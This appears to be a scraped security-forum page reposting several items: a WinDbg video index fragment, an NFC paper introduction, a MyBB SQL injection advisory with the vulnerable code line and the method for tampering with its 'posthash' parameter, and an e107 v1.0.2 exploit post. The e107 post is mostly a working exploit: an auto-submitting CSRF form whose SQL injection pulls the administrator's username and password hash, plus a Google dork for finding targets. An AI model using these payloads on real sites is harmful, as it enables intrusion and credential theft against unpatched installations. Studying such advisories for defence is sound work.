Protection (!vprot <addr>) [29:14] - Mapped Files (!mapped_file <addr>) Sursa: Defrag Tools: #21 - WinDbg - Memory User Mode | Defrag Tools | Channel 9

NFC - NEAR FIELD COMMUNICATION Subho Halder and Aditya Gupta ........................................................ INTRODUCTION Near Field Communication at glance. What is NFC ? NFC or Near Field Communication is a set of standards or protocols to communicate between two devices by either touching or bringing into close proximity ( less than 4 cm ). The communicating protocols of such devices are based on RFID Standards, including ISO 14443. These standards are defined and extended by the NFC Forum, which was founded on 2004 by some major companies such as Sony, Nokia, Philips, Samsung etc. The operating Frequency of such communication is merely 13.56 MHz ( +/- 7 ) which is very low. This gives an advantage of easily integrating into portable devices without the need of much battery power. Download: www.exploit-db.com/download_pdf/23826

[h=1]MyBB (editpost.php, posthash) SQL Injection Vulnerability[/h] MyBB <1.6.9 is vulnerable to Stored, Error based, SQL Injection. Vulnerable code: /editpost.php === Line 398 === $posthash_query = "posthash='{$posthash}' OR "; === It can be done by using Tamper Data(Or Live HTTP Headers), and when submitting a post, edit the 'posthash' POST parameter to your payload, submitting, then going to edit your post. Small "HOWTO" in picture: http://imgur.com/a/JxfEI This bug was not found by me, but afaik, I am the first one to release it. -- *Joshua Rogers* - Retro Game Collector && IT Security Specialist gpg pubkey <http://www.internot.info/docs/gpg_pubkey.asc.gpg> Sursa: MyBB (editpost.php, posthash) SQL Injection Vulnerability

[h=1]e107 v1.0.2 CSRF Resulting in SQL Injection[/h] # Exploit Title: e107 v1.0.2 Administrator CSRF Resulting in SQL Injection # Google Dork: intext:"This site is powered by e107" # Date: 01/01/13 # Exploit Author: Joshua Reynolds # Vendor Homepage: http://e107.org # Software Link: http://sourceforge.net/projects/e107/files/e107/e107%20v1.0.2/e107_1.0.2_full.tar.gz/download # Version: 1.0.2 # Tested on: BT5R1 - Ubuntu 10.04.2 LTS # CVE: CVE-2012-6434 ----------------------------------------------------------------------------------------- Description: Cross-Site Request Forgery vulnerability in the e107_admin/download.php page, which is also vulnerable to SQL injection in the POST form. The e-token or ac tokens are not used in this page, which results in the CSRF vulnerability. This in itself is not a major security vulnerability but when done in conjunction with a SQL injection attack it can result in complete information disclosure. The parameters which are vulnerable to SQL injection on this page include: download_url, download_url_extended, download_author_email, download_author_website, download_image, download_thumb, download_visible, download_class. The following is an exploit containing javascript code that submits a POST request on behalf of the administrator once the page is visited. It contains a SQL injection that would provide the username and password (in MD5) of the administrator to be added to the Author Name of a publicly available download. ------------------------------------------------------------------------------------------ Exploit: <html> <body onload="document.formCSRF.submit();"> <form method="POST" name="formCSRF" action="http://[site]/e107/e107102/e107_admin/download.php?create"> <input type="hidden" name="cat_id" value="1"/> <input type="hidden" name="download_category" value="2"/> <input type="hidden" name="download_name" value="adminpassdownload"/> <input type="hidden" name="download_url" value="test.txt', (select concat(user_loginname,'::',user_password) from e107_user where user_id = '1'), '', '', '', '', '0', '2', '2', '1352526286', '', '', '2', '0', '', '0', '0' ) -- -"/> <input type="hidden" name="download_url_external" value=""/> <input type="hidden" name="download_filesize_external" value=""/> <input type="hidden" name="download_filesize_unit" value="KB"/> <input type="hidden" name="download_author" value=""/> <input type="hidden" name="download_author_email" value=""/> <input type="hidden" name="download_author_website" value=""/> <input type="hidden" name="download_description" value=""/> <input type="hidden" name="download_image" value=""/> <input type="hidden" name="download_thumb" value=""/> <input type="hidden" name="download_datestamp" value=""/> <input type="hidden" name="download_active" value="1"/> <input type="hidden" name="download_datestamp" value="10%2F11%2f2012+02%3A47%3A47%3A28"/> <input type="hidden" name="download_comment" value="1"/> <input type="hidden" name="download_visible" value="0"/> <input type="hidden" name="download_class" value="0"/> <input type="hidden" name="submit_download" value="Submit+Download"/> </form> </body> </html> ------------------------------------------------------------------------------------------ Fix: This bug has been fixed in the following revision: r13058 ------------------------------------------------------------------------------------------ Shout outs: Red Hat Security Team, Ms. Umer, Dr. Wu, Tim Williams, friends, & family. Contact: Mail: infosec4breakfast@gmail.com Blog: infosec4breakfast.com Twitter: @jershmagersh Youtube: youtube.com/user/infosec4breakfast Sursa: e107 v1.0.2 CSRF Resulting in SQL Injection